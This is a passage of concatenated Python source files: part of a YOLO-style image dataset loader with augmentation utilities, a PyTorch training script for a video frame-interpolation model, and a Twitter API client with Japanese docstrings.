assert nf > 0 or n == 20288, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
if not labels_loaded and n > 1000:
print('Saving labels to %s for faster future loading' % np_labels_path)
np.save(np_labels_path, self.labels) # save for next time
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=self.mosaic_border) # border to remove
return img4, labels4
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[1] + border[1] # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[0] + border[0] # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 2) & (h > 2) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 20)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
train.py | import sys
import os
import threading
import torch
from torch.autograd import Variable
import torch.utils.data
from lr_scheduler import *
import numpy
from AverageMeter import *
from loss_function import *
import datasets
import balancedsampler
import networks
from my_args import args
def train():
torch.manual_seed(args.seed)
model = networks.__dict__[args.netName](channel=args.channels,
filter_size=args.filter_size,
timestep=args.time_step,
training=True)
if args.use_cuda:
print("Turn the model into CUDA")
model = model.cuda()
if args.SAVED_MODEL:
# args.SAVED_MODEL ='../model_weights/'+ args.SAVED_MODEL + "/best" + ".pth"
args.SAVED_MODEL = './model_weights/best.pth'
print("Fine tuning on " + args.SAVED_MODEL)
if not args.use_cuda:
pretrained_dict = torch.load(args.SAVED_MODEL, map_location=lambda storage, loc: storage)
# model.load_state_dict(torch.load(args.SAVED_MODEL, map_location=lambda storage, loc: storage))
else:
pretrained_dict = torch.load(args.SAVED_MODEL)
# model.load_state_dict(torch.load(args.SAVED_MODEL))
# print([k for k,v in pretrained_dict.items()])
model_dict = model.state_dict()
# 1. filter out unnecessary keys
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
# 2. overwrite entries in the existing state dict
model_dict.update(pretrained_dict)
# 3. load the new state dict
model.load_state_dict(model_dict)
pretrained_dict = None
if type(args.datasetName) == list:
train_sets, test_sets = [], []
for ii, jj in zip(args.datasetName, args.datasetPath):
tr_s, te_s = datasets.__dict__[ii](jj, split=args.dataset_split, single=args.single_output, task=args.task)
train_sets.append(tr_s)
test_sets.append(te_s)
train_set = torch.utils.data.ConcatDataset(train_sets)
test_set = torch.utils.data.ConcatDataset(test_sets)
else:
train_set, test_set = datasets.__dict__[args.datasetName](args.datasetPath)
train_loader = torch.utils.data.DataLoader(
train_set, batch_size=args.batch_size,
sampler=balancedsampler.RandomBalancedSampler(train_set, int(len(train_set) / args.batch_size)),
num_workers=args.workers, pin_memory=True if args.use_cuda else False)
val_loader = torch.utils.data.DataLoader(test_set, batch_size=args.batch_size,
num_workers=args.workers, pin_memory=True if args.use_cuda else False)
print('{} samples found, {} train samples and {} test samples '.format(len(test_set) + len(train_set),
len(train_set),
len(test_set)))
# if not args.lr == 0:
print("train the interpolation net")
optimizer = torch.optim.Adamax([
{'params': model.initScaleNets_filter.parameters(), 'lr': args.filter_lr_coe * args.lr},
{'params': model.initScaleNets_filter1.parameters(), 'lr': args.filter_lr_coe * args.lr},
{'params': model.initScaleNets_filter2.parameters(), 'lr': args.filter_lr_coe * args.lr},
{'params': model.ctxNet.parameters(), 'lr': args.ctx_lr_coe * args.lr},
{'params': model.flownets.parameters(), 'lr': args.flow_lr_coe * args.lr},
{'params': model.depthNet.parameters(), 'lr': args.depth_lr_coe * args.lr},
{'params': model.rectifyNet.parameters(), 'lr': args.rectify_lr}
],
lr=args.lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=args.weight_decay)
scheduler = ReduceLROnPlateau(optimizer, 'min', factor=args.factor, patience=args.patience, verbose=True)
print("*********Start Training********")
print("LR is: " + str(float(optimizer.param_groups[0]['lr'])))
print("EPOCH is: " + str(int(len(train_set) / args.batch_size)))
print("Num of EPOCH is: " + str(args.numEpoch))
def count_network_parameters(model):
parameters = filter(lambda p: p.requires_grad, model.parameters())
N = sum([numpy.prod(p.size()) for p in parameters])
return N
print("Num. of model parameters is :" + str(count_network_parameters(model)))
if hasattr(model, 'flownets'):
print("Num. of flow model parameters is :" +
str(count_network_parameters(model.flownets)))
if hasattr(model, 'initScaleNets_occlusion'):
print("Num. of initScaleNets_occlusion model parameters is :" +
str(count_network_parameters(model.initScaleNets_occlusion) +
count_network_parameters(model.initScaleNets_occlusion1) +
count_network_parameters(model.initScaleNets_occlusion2)))
if hasattr(model, 'initScaleNets_filter'):
print("Num. of initScaleNets_filter model parameters is :" +
str(count_network_parameters(model.initScaleNets_filter) +
count_network_parameters(model.initScaleNets_filter1) +
count_network_parameters(model.initScaleNets_filter2)))
if hasattr(model, 'ctxNet'):
print("Num. of ctxNet model parameters is :" +
str(count_network_parameters(model.ctxNet)))
if hasattr(model, 'depthNet'):
print("Num. of depthNet model parameters is :" +
str(count_network_parameters(model.depthNet)))
if hasattr(model, 'rectifyNet'):
print("Num. of rectifyNet model parameters is :" +
str(count_network_parameters(model.rectifyNet)))
training_losses = AverageMeter()
auxiliary_data = []
saved_total_loss = 10e10
# saved_total_PSNR = -1
ikk = 0
for kk in optimizer.param_groups:
if kk['lr'] > 0:
ikk = kk
break
for t in range(args.numEpoch):
print("The id of this in-training network is " + str(args.uid))
print(args)
# Turn into training mode
model = model.train()
for i, (X0_half, X1_half, y_half) in enumerate(train_loader):
if i >= int(len(train_set) / args.batch_size):
# (0 if t == 0 else EPOCH):#
break
X0_half = X0_half.cuda() if args.use_cuda else X0_half
X1_half = X1_half.cuda() if args.use_cuda else X1_half
y_half = y_half.cuda() if args.use_cuda else y_half
X0 = Variable(X0_half, requires_grad=False)
X1 = Variable(X1_half, requires_grad=False)
y = Variable(y_half, requires_grad=False)
diffs, offsets, filters, occlusions = model(torch.stack((X0, y, X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [X0, X1], epsilon=args.epsilon)
total_loss = sum(x * y if x > 0 else 0 for x, y in zip(args.alpha, pixel_loss))
training_losses.update(total_loss.item(), args.batch_size)
if i % max(1, int(int(len(train_set) / args.batch_size) / 500.0)) == 0:
print("\t\tSaving the model...")
torch.save(model.state_dict(), args.save_path + "/checkpoint" + str(i) + ".pth")
if i % max(1, int(int(len(train_set) / args.batch_size) / 100.0)) == 0:
print("Ep [" + str(t) + "/" + str(i) +
"]\tl.r.: " + str(round(float(ikk['lr']), 7)) +
"\tPix: " + str([round(x.item(), 5) for x in pixel_loss]) +
"\tTV: " + str([round(x.item(), 4) for x in offset_loss]) +
"\tSym: " + str([round(x.item(), 4) for x in sym_loss]) +
"\tTotal: " + str([round(x.item(), 5) for x in [total_loss]]) +
"\tAvg. Loss: " + str([round(training_losses.avg, 5)]))
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
if t == 1:
# delete the pre validation weights for cleaner workspace
if os.path.exists(args.save_path + "/epoch" + str(0) + ".pth"):
os.remove(args.save_path + "/epoch" + str(0) + ".pth")
if os.path.exists(args.save_path + "/epoch" + str(t - 1) + ".pth"):
os.remove(args.save_path + "/epoch" + str(t - 1) + ".pth")
torch.save(model.state_dict(), args.save_path + "/epoch" + str(t) + ".pth")
# print("\t\t**************Start Validation*****************")
# Turn into evaluation mode
val_total_losses = AverageMeter()
val_total_pixel_loss = AverageMeter()
val_total_PSNR_loss = AverageMeter()
val_total_tv_loss = AverageMeter()
val_total_pws_loss = AverageMeter()
val_total_sym_loss = AverageMeter()
for i, (X0, X1, y) in enumerate(val_loader):
if i >= int(len(test_set) / args.batch_size):
break
with torch.no_grad():
X0 = X0.cuda() if args.use_cuda else X0
X1 = X1.cuda() if args.use_cuda else X1
y = y.cuda() if args.use_cuda else y
diffs, offsets, filters, occlusions = model(torch.stack((X0, y, X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [X0, X1],
epsilon=args.epsilon)
val_total_loss = sum(x * y for x, y in zip(args.alpha, pixel_loss))
per_sample_pix_error = torch.mean(torch.mean(torch.mean(diffs[args.save_which] ** 2,
dim=1), dim=1), dim=1)
per_sample_pix_error = per_sample_pix_error.data # extract tensor
psnr_loss = torch.mean(20 * torch.log(1.0 / torch.sqrt(per_sample_pix_error))) / torch.log(
torch.Tensor([10]))
#
val_total_losses.update(val_total_loss.item(), args.batch_size)
val_total_pixel_loss.update(pixel_loss[args.save_which].item(), args.batch_size)
val_total_tv_loss.update(offset_loss[0].item(), args.batch_size)
val_total_sym_loss.update(sym_loss[0].item(), args.batch_size)
val_total_PSNR_loss.update(psnr_loss[0], args.batch_size)
print(".", end='', flush=True)
print("\nEpoch " + str(int(t)) +
"\tlearning rate: " + str(float(ikk['lr'])) +
"\tAvg Training Loss: " + str(round(training_losses.avg, 5)) +
"\tValidate Loss: " + str([round(float(val_total_losses.avg), 5)]) +
"\tValidate PSNR: " + str([round(float(val_total_PSNR_loss.avg), 5)]) +
"\tPixel Loss: " + str([round(float(val_total_pixel_loss.avg), 5)]) +
"\tTV Loss: " + str([round(float(val_total_tv_loss.avg), 4)]) +
"\tPWS Loss: " + str([round(float(val_total_pws_loss.avg), 4)]) +
"\tSym Loss: " + str([round(float(val_total_sym_loss.avg), 4)])
)
auxiliary_data.append([t, float(ikk['lr']),
training_losses.avg, val_total_losses.avg, val_total_pixel_loss.avg,
val_total_tv_loss.avg, val_total_pws_loss.avg, val_total_sym_loss.avg])
numpy.savetxt(args.log, numpy.array(auxiliary_data), fmt='%.8f', delimiter=',')
training_losses.reset()
print("\t\tFinished an epoch, Check and Save the model weights")
# we check the validation loss instead of training loss. OK~
if saved_total_loss >= val_total_losses.avg:
saved_total_loss = val_total_losses.avg
torch.save(model.state_dict(), args.save_path + "/best" + ".pth")
print("\t\tBest Weights updated for decreased validation loss\n")
else:
print("\t\tWeights Not updated for undecreased validation loss\n")
# schedule the learning rate
scheduler.step(val_total_losses.avg)
print("*********Finish Training********")
if __name__ == '__main__':
sys.setrecursionlimit(100000) # 0xC00000FD exception for the recursive detach of gradients.
threading.stack_size(200000000) # 0xC00000FD exception for the recursive detach of gradients.
thread = threading.Thread(target=train)
thread.start()
thread.join()
exit(0)
|
utils.py | u"""twitter apiを叩くクライアントを提供する."""
import json
import os
import threading
import datetime
from pytz import timezone
from queue import Queue
from requests_oauthlib import OAuth1Session
# from django.core.paginator import Paginator
def merge_two_dicts(a, b):
u"""2つの辞書オブジェクトを合体させる."""
c = a.copy()
c.update(b)
return c
class TwitterClient:
u"""クライアントを提供."""
def __init__(self, user={}):
u"""
Consumer keyとaccess tokenからクライアントを生成する.
ユーザーがログインしていればその人のトークンを使い、なければ管理者のものを使う.
"""
if user == {}:
self.AT = os.environ['tw_at']
self.AS = os.environ['tw_as']
else:
self.AT = user['oauth_token']
self.AS = user['oauth_token_secret']
self.CK = os.environ['tw_ck']
self.CS = os.environ['tw_cs']
self.session = OAuth1Session(self.CK, self.CS, self.AT, self.AS)
self.urls = {
'timeline':
'https://api.twitter.com/1.1/statuses/home_timeline.json',
'favlist': 'https://api.twitter.com/1.1/favorites/list.json',
'user': 'https://api.twitter.com/1.1/users/show.json',
'oembed': 'https://publish.twitter.com/oembed',
'request_token': 'https://twitter.com/oauth/request_token',
'access_token': 'https://twitter.com/oauth/access_token',
'authorize': 'https://twitter.com/oauth/authorize',
'account_verified':
'https://api.twitter.com/1.1/account/verify_credentials.json',
'tweet': 'https://api.twitter.com/1.1/statuses/show.json',
}
def timeline(self):
u"""ユーザー自身のタイムラインを表示."""
res = self.session.get(self.urls['timeline'], params={})
if res.status_code != 200:
raise Exception()
return json.loads(res.text)
def favlist(self, user_id, page=1, count=100):
u"""対象ユーザーのユーザーのいいね欄を表示."""
params = {
'user_id': user_id,
'count': count,
'page': page,
}
res = self.session.get(self.urls['favlist'], params=params)
if res.status_code != 200:
raise Exception()
return json.loads(res.text)
def user_from_screen_name(self, screen_name):
u"""ユーザーの@hogeからユーザー情報を返す."""
params = {
'screen_name': screen_name,
}
res = self.session.get(self.urls['user'], params=params)
if res.status_code != 200:
raise Exception()
return json.loads(res.text)
def show_tweets(self, tweets):
u"""ツイートのリストを受け取って表示."""
for item in tweets:
print(item['text'])
def show_user(self, user):
u"""ユーザー情報を受け取って表示."""
print('User ID: {}'.format(user['id_str']))
print('Screen Name: {}'.format(user['screen_name']))
print('Name: {}'.format(user['name']))
def user_id_from_screen_name(self, screen_name):
u"""ユーザーの@名からユーザーのid_strを返す."""
try:
user = self.user_from_screen_name(screen_name)
except:
raise Exception()
return user['id_str']
def html_embedded(self, tweet, q):
u"""Twitter widget用のHTMLを得て、上書きする."""
# 鍵垢は除外
if tweet['user']['protected']:
q.put({})
return
url = 'https://twitter.com/{screen_name}/status/{tweet_id}'.format(
screen_name=tweet['user']['screen_name'], tweet_id=tweet['id_str'])
params = {
'url': url,
'maxwidth': 300,
}
res = self.session.get(self.urls['oembed'], params=params)
if res.status_code != 200:
return ''
q.put(json.loads(res.text)['html'])
def add_htmls_embedded(self, tweets):
u"""ツイートリストにHTML情報を全て書き込む."""
threads = []
queues = []
for tweet in tweets:
q = Queue()
queues.append(q)
th = threading.Thread(target=self.html_embedded, args=(tweet, q))
th.start()
threads.append(th)
tweets_add = []
for th, q, tweet in zip(threads, queues, tweets):
th.join()
if tweet['user']['protected']:
continue
tweet_add = merge_two_dicts(tweet, {'html_embedded': q.get()})
tweets_add.append(tweet_add)
return tweets_add
def tweet_from_id(self, tweet_id):
u"""ツイートIDからツイートを取得."""
params = {
'id': tweet_id,
}
res = self.session.get(self.urls['tweet'], params=params)
if res.status_code != 200:
raise Exception()
return json.loads(res.text)
def is_pc(request):
u"""ユーザーエージェントからPC or SPを判断."""
from user_agents import parse
ua_string = request.META['HTTP_USER_AGENT']
user_agent = parse(ua_string)
return not user_agent.is_mobile
# return True
def ignore_exceptions(func, items):
u"""例外を吐かなかったものだけをリスト化して返す."""
def carry_out(func, item, q):
u"""一つだけ実行する."""
try:
q.put(func(item))
except:
q.put(None)
threads = []
queues = []
for item in items:
q = Queue()
queues.append(q)
th = threading.Thread(target=carry_out, args=(func, item, q))
th.start()
threads.append(th)
result = []
for th, q, item in zip(threads, queues, items):
th.join()
res = q.get()
if res:
result.append(res)
print(len(items))
return result
def parse_datetime(string):
u"""文字列をパースしてTokyo基準のdatetime型に変換する."""
dt = datetime.datetime.strptime(string, '%a %b %d %H:%M:%S +0000 %Y')
